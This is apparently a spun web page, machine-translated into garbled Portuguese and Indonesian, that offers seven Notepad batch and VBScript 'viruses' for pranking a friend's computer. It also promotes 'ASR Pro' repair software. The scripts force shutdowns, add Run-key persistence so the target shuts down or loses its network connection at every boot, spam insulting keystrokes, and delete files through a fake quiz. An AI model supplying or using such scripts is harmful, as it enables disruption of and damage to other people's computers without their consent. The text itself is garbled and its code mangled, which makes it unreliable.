You are currently viewing Solução Para Membuat Spyware Dengan Notepad

Solução Para Membuat Spyware Dengan Notepad

Se você está recebendo o erro do bloco de notas do Membuat Spyware Dengan, o artigo de hoje veio para ajudá-lo.

Reparo rápido e fácil do PC

  • 1. Baixe e instale o ASR Pro
  • 2. Abra o programa e clique em "Digitalizar"
  • 3. Clique em "Reparar" para iniciar o processo de reparo
  • Desfrute de um mais rápido

    Siapa sih yang tidak takut dengan infecção por computador de sementes de plantas? computador trojan terkena, maka besar kemungkinan computador kamu jadi tidak bisa digunakan. Apalagi jika komputer kamu kena salah satu dari 20 trojans komputer paling berbahaya dunia di.Tamat sudah, antara harus beli komputer baru atau install ulang.

    Di balik seramnya serangan laptop ou computador computador, maka berikan jalantikus kamu kumpulan script hacker buat membuat pc virus computador sederhana. Mau Biar Nggak? kelihatan pintar caiaque nullr profissional gitu.simak nove script tosse membuat virus sederhana dengan notepad.

    7 Membuat Virus Sederhana Hack Script

    Sudah tahu viral komputer itu berbahaya, kok JalanTikus bagikan cara membuat virusnya sih? Ya karena virus computer yang JalanTikus bagikan ini kuma berisi pedaço de programação de software sederhana yang akan mengacaukan fungsi tanpa komputer merusak equipment atau membokorkan informasi yang American Dental Association em dalamnya. Jadi Aman David Kokok Untuk digunakan notebook menjahili teman kamu.

    1. Parada de Membuat

    Virus virus kerja bug komputer sederhana ini adalah dengan memaksa komputer teman atau jadi direto Shutdown. Untuk melakukannya, silakan buka Notepad, serta copy paste passcode bawah di. Lalu save file-nya nama dengan ForceShutdown.bat type certificate file-nya File all.

    @Echo desligadomensagem 7. eu não deveria gostar de vocêshutdown -c “Erro! O computador foi desligado!” -COM

    Reparo rápido e fácil de PC

    O seu computador está um pouco mais lento do que costumava? Talvez você esteja recebendo mais e mais pop-ups ou sua conexão com a Internet pareça um pouco irregular. Não se preocupe, há uma solução! ASR Pro é o novo software revolucionário que ajuda você a corrigir todos os problemas irritantes do Windows com apenas o clique de um botão. Com ASR Pro, seu computador estará funcionando como novo em pouco tempo!

  • 1. Baixe e instale o ASR Pro
  • 2. Abra o programa e clique em "Digitalizar"
  • 3. Clique em "Reparar" para iniciar o processo de reparo

  • Untuk mengaktifkan virus ini, kamu harus klik basicamente dois arquivos kali pada-nya. Maca, Otomatis secara virusini akan berjalan.

    2. Parada Paksa Setiap Kali Dengan Dinyalakan

    berbeda sebelumnya antivírus, vírus sederhana yang ini akan memaksa komputer teman kamu buat shutdown setiap kali dinyalakan. Ayts, jangan asal gunakan virus ini kalo siap gak tanggung akibatnya ya!

    echo @echo off>c:windowshartlell.batecho-dump>>c:windowshartlell.batecho -r shutdown -t 88 -f>>c:windowshartlell.batecho end>>c:windowshartlell.batreg post hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI Reg_sz /t /d c:windowshartlell.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz C:windowshartlell /d.bat /fecho Você foi hackeado.PAUSA

    Simpan relata buatan kamu atas di dengan nama hampi semua. Jangan lupa ekstensi gunakan .beat you! Clique em “Desativar menos ativo”.

    3. Mematikan Internet Secara Permanente

    Mais informações sobre seu site online, por favor, use a American Dental Assoc. Baixar Orang Yang Malach? Bikin im Internet lemot karena data berkurang cepat. Makanya, coba Internet matikan teman kamu menggunakan sederhana berikut, cenário hsv:

    echo @echo off>c:windowswimn32.batecho-blast>>c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.batecho end>>c:windowswimn32.batreg estão importando hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI Reg_sz /t /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t /d reg_sz c:windowswimn32.bat /fecho Você foi hackeado!PAUSA

    Sepertibias, simpandengan nama hampir semua gunakan dan ekstensi.bat. Clique aqui para mengaktifkannya!

    4. Caps Lock

    Siapa yang tidak kesal jika American Dental Association ou ngetik isinya huruf besar semua? Orang Yang minerima pesan dengan huruf besar semua jelas akan terganggu, merasa atau bahkan marah. Makanya, yuk isengin teman kamu dengan membuat Caps tombol Lock-nya nyala terus menggunakan vírus roteiro sederhana berikut:

    Copie e cole o cupom dos arquivos no bloco de notas, realmente deixe-o com o comando ForceCapsLock.vbs e o tipo de arquivo nya All File. Pressione 2 kali buat mulai mengaktifkan sederhana computer virus ini.

    5. VirusAlai

    Siapa faz com que cuma muda kekinian doang yang bisa alay? Computador kamu juga bisa alay loh kalo virus terinspeksi teclado alay. Não, Buat Membuat Virus Computer Jan Akan Membuat PC Keyboard Jadi Alai, Kamu Bisa Gunakan Software Sama, Bericut:

    Copie Caranya e o código da substância no bloco de notas. Salve o arquivo como ForceAlay.vbs e escreva o arquivo inteiro.

    6. Vírus Orang Jelek

    membuat spyware com bloco de notas

    Digite-se em qualquer lugar. Kalo kuma sekali dua kali sih harushna masih bisa ditahan, tapi kalo terus-terusan ngatai gimana jelek koba? Não, dengan kode di bawah ini, kamu bisa membuat sebuah computer computer sederhana yang akan memaksa komputer target unuk mengeluarkan vigilant bahwa ‘dia jelek’ tanpa heti.

    Definir wshShellsignificandowscript.CreateObject(“WScript.Shell”)Fazerwscript.sleep 100wshshell.sendkeys “Computador de Muka Lu Jelek Kayak Lou“fita

    Copiar e colar script sederhana di ke atas Notepad. Oh ia, kamu bisa bagian ganti varna merah dengan kata-kata sesuay selera, lalu dengan nama loja de varejo VirusOrangJelek.vbs.

    7. Teste de vírus

    Semua orang suka kuis kalo apalagi Berhadiah. Tapi kamu bakal kesal deh pasti setiap kalo kali mau buka komputer, ternyata yang nongol adalah kuis. Sim eu posso? Buat kamu yang mau isengin foco no computador dengan kuis-kuis menyebalkan, coba kamu gunakan script berikut:

    @Echo desligadoA url é Kuis hari ini!:CardápioclassificarEcho Jika kamu kena hsv apa yang kamu pilih lakukan?PausaEco de Yang Mang:eco 1. Computador matinalEcho 2. formato ajaEco 3. NangisEco 4. Barra de Computador BeliEnter = não há necessidade de instalar nadaset /p entrada=selecionar:se %input%==1 – eles parariam -ttrintase %input%==2 excluir c:xxxse %input%==3 @ECHO estiver desabilitadomsg * Farinha de doce de camumensagem * Ngacha dulu gih!msg (em branco) Hayo lê, CPU lê gw acak-acak ya4. Postagens Ouda, instale oolang ajamsg mau kelar kan [email protected] desligado:acimaINICIAR %SystemRoot%system32notepad.exeLevantar

    Copie e cole o caderno trabalhando com ViruzQuiz nama.bat. Selesai, tinggal jalankan buat mengujinya.

    Agar berjalan lancar, coba simpan list virus komputer sederhana yang kamu buat komputer di target. Lalu letakkan dizer conciso di desktop, ícone de john jangan lupa ubah